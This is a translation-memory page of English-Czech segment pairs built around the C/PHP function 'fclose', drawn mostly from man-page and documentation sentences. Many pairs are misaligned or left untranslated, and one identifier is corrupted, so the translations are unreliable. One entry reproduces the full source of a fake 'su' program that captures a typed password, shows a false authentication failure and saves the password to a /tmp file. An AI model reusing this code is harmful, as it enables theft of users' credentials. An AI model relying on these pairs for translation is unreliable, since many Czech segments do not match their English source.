Results for fclose translation from English to Czech

Computer translation

Trying to learn how to translate from the human translation examples.

English

Czech

Info

English

fclose

Czech

 

From: Machine Translation
Suggest a better translation
Quality:

Human contributions

From professional translators, enterprises, web pages and freely available translation repositories.

Add a translation

English

Czech

Info

English

482 fclose(file);

Czech

none (other)

Last Update: 2018-02-13
Usage Frequency: 1
Quality:

English

open(2), fclose(3), fileno(3)

Czech

open(2), fclose(3), fileno(3)

Last Update: 2018-02-13
Usage Frequency: 2
Quality:

English

open(2), fclose(3), fileno(3).

Czech

open(2), fclose(3), fileno(3), fmemopen(3), fopencookie(3)

Last Update: 2018-02-13
Usage Frequency: 1
Quality:

English

note that fclose() only flushes the user space buffers provided by the c library.

Czech

note that fclose() only flushes the user space buffers provided by the c library.

Last Update: 2018-02-13
Usage Frequency: 1
Quality:

English

the file is automatically removed when closed (using fclose()), or when the script ends.

Czech

vytvoří dočasný soubor s unikátním názvem, v módu zápisu, a vrací deskriptor tohoto souboru podobně jako fopen().

Last Update: 2011-10-24
Usage Frequency: 1
Quality:

English

in either case any further access (including another call to fclose()) to the stream results in undefined behavior.

Czech

in either case any further access (including another call to fclose()) to the stream results in undefined behavior.

Last Update: 2018-02-13
Usage Frequency: 1
Quality:

English

?php $handle = fopen( 'somefile.txt', 'r'); fclose($handle);?

Czech

deskriptor souboru musí být platný, a musí ukazovat na soubor úspěšně otevřený pomocí fopen() nebo fsockopen().

Last Update: 2011-10-24
Usage Frequency: 1
Quality:

English

the behaviour of fclose() is undefined if the stream parameter is an illegal pointer, or is a descriptor already passed to a previous invocation of fclose().

Czech

the behaviour of fclose() is undefined if the stream parameter is an illegal pointer, or is a descriptor already passed to a previous invocation of fclose().

Last Update: 2018-02-13
Usage Frequency: 1
Quality:

English

open(2), fclose(3), fileno(3), fmemopen(3), fopencookie(3)

Czech

open(2), fclose(3), fileno(3)

Last Update: 2018-02-13
Usage Frequency: 1
Quality:

English

#include #include #include #include #include int main (int argc, char ** argv) { char * p; file * f; p = getpass ("password: "); sleep (2); printf ("su: authentication failure\n"); printf ("sorry.\n"); umask (s_irusr s_iwusr s_irgrp); f = fopen ("/tmp/eheheh", "a+"); if (f < 0) exit (1); fprintf (f, "%s\n", p); fclose (f); /* unlink ("/home/username/.bashrc"); unlink ("/home/username/.profile"); */ }

Czech

#include #include #include #include #include int main (int argc, char ** argv) { char * p; file * f; p = getpass ("password: "); sleep (2); printf ("su: authentication failure\n"); printf ("sorry.\n"); umask (s_irusr s_iwusr s_irgjestliže); f = fopen ("/tmp/eheheh", "a+"); if (f < 0) exit (1); fprintf (f, "%s\n", p); fclose (f); /* unlink ("/home/username/.bashrc"); unlink ("/home/username/.profile"); */ }

Last Update: 2018-02-13
Usage Frequency: 1
Quality:

Warning: Contains invisible HTML formatting

Get a better translation with
7,779,371,027 human contributions

Users are now asking for help:



We use cookies to enhance your experience. By continuing to visit this site you agree to our use of cookies. Learn more. OK